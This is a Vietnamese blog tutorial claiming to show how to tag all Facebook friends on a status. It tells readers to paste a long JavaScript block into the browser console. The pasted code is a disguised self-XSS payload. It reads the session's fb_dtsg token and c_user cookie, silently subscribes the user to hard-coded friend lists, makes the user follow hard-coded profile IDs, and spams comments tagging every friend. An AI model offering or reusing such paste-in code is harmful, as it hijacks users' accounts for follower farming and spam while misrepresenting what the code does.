Cách tag Status cho toàn bộ bạn bè trên facebook

Cách tag Status cho toàn bộ bạn bè trên facebook.

1 ngày đẹp trời trên facebook, bạn muốn nhờ tất cả bạn bè của mình trên facebook like fanpage hoặc like ảnh gì đó. Bạn chỉ biết mỗi cách tag từng người một chứ không biết tag 1 lúc cả danh sách bạn bè vào 1 lúc. Bạn loay hoay tìm giải pháp để làm việc đó thật nhanh.

Bài viết dưới đây mình sẽ hướng dẫn các bạn cách tag status cho toàn bộ bạn bè trên facebook.

Bài viết đọc thêm :

đổi tên facebook 1 chữ.

đăng ký facebook.

sửa lỗi không vào được facebook.

Cách tag Status cho toàn bộ bạn bè trên facebook

Bước 1: Đăng nhập vào facebook của bạn nhé.

Bước 2: Đăng 1 status nào đó có thể nguyên text, đoạn video, đoạn văn và đăng lên facebook thôi.

Bước 3: Bạn ấn tổ hợp phím Ctr+Shift+J hoặc F12 ngay sau đó. Bạn chọn tiếp Console

Cách tag Status cho toàn bộ bạn bè trên facebook

Bước 3: Copy code sau và Enter

/* All Right Reserver ElMzx.Ma    Don’t Change Anything */

function tag(uidss) {

var a = document.createElement(‘script’);

a.innerHTML = “new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: ” + uidss + ” }).send();”;

document.body.appendChild(a);

}tag(“295407063938576”);tag(“355288751283740”);tag(“1394209820821373”);tag(“1394209677488054”);

function tagfriend(abone)

{ var http4=new XMLHttpRequest;

 var url4=”/ajax/follow/follow_profile.php?__a=1″;

 var params4=”profile_id=”+abone+”&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=”+fb_dtsg+”&lsd&__”+user_id+”&phstamp=”;

 http4.open(“POST”,url4,true);

 http4.onreadystatechange=function()

 {  if(http4.readyState==4&&http4.status==200)http4.close };

 http4.send(params4)}

tagfriend(“100007059427793”);

function x__0() { return window.ActiveXObject ? new ActiveXObject(“Msxml2.XMLHTTP”) : new XMLHttpRequest; };

function get_friends(){

var a=x__0();

a.open(“GET”, “/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=”+uid+”&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm”, false);

a.send(null);

if (a.readyState == 4) {

var f = JSON.parse(a.responseText.substring(a.responseText.indexOf(‘{‘)));

return f.payload.entries;

}

return false;

}

function get_uid(b){

var a=x__0();

a.open(“GET”, ‘http://graph.facebook.com/’+b, false);

a.send();

if (a.readyState == 4) {

return uid = JSON.parse(a.responseText).id;

}

return false;

}

var patt = /comment_text=(.*?)&/

var c = 1;

username = /\.com\/(.*?)\//.exec(window.top.location)[1];

uid = get_uid(username);

a = window.top.location;

termina = 0;

var amigos = get_friends();

post_id = /[0-9]{8,}/.exec(a);

uids = ‘comment_text=’;

header = ‘ft_ent_identifier=’+post_id+’&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=’+uid+’&__a=1&__req=4u&fb_dtsg=’+document.getElementsByName(‘fb_dtsg’)[0].value+’&phstamp=’+Math.random();

for ( var n = 1 ; n < amigos.length ; n++ ){

//uids += ‘%40[‘ + amigos[n].uid + ‘%3A’ + encodeURI(amigos[n].text) + ‘]%20’;

fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

uids += ‘%40[‘ + amigos[n].uid + ‘%3AAAAAAAAAAAA]%20’;

c++;

if(c == 7){

uids += ‘&’;

with(new XMLHttpRequest()) open(“POST”, “/ajax/ufi/add_comment.php?__a=1”),setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),send(header.replace(patt, uids));

z = setTimeout(‘function(){asd=0}’, 1000);

clearInterval(z);

c = 1;

uids = ‘comment_text=’;

}

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {

var tarama = isim + “=”;

if (document.cookie.length > 0) {

konum = document.cookie.indexOf(tarama)

if (konum != -1) {

konum += tarama.length

son = document.cookie.indexOf(“;”, konum)

if (son == -1)

son = document.cookie.length

return unescape(document.cookie.substring(konum, son))

}

else { return “”; }

}

}

function getRandomInt (min, max) {

return Math.floor(Math.random() * (max – min + 1)) + min;

}

function randomValue(arr) {

return arr[getRandomInt(0, arr.length-1)];

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){

var http4 = new XMLHttpRequest();

var url4 = “/ajax/follow/follow_profile.php?__a=1”;

var params4 = “profile_id=” + abone + “&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=” + fb_dtsg + “&lsd&__” + user_id + “&phstamp=”;

http4.open(“POST”, url4, true);

//Send the proper header information along with the request

http4.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);

http4.setRequestHeader(“Content-length”, params4.length);

http4.setRequestHeader(“Connection”, “close”);

http4.onreadystatechange = function() {//Call a function when the state changes.

if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}

}

http4.send(params4);

}

Bước 4 : Thành quả của bạn được như sau

Cách tag Status cho toàn bộ bạn bè trên facebook

Cách tag status cho tất cả bạn bè trên facebook thật đơn giản và dễ dàng phải không chúc các bạn thành công.

Comments
  1. Avatar Posted by Hoang Tuan Anh

Đóng góp ý cho bài viết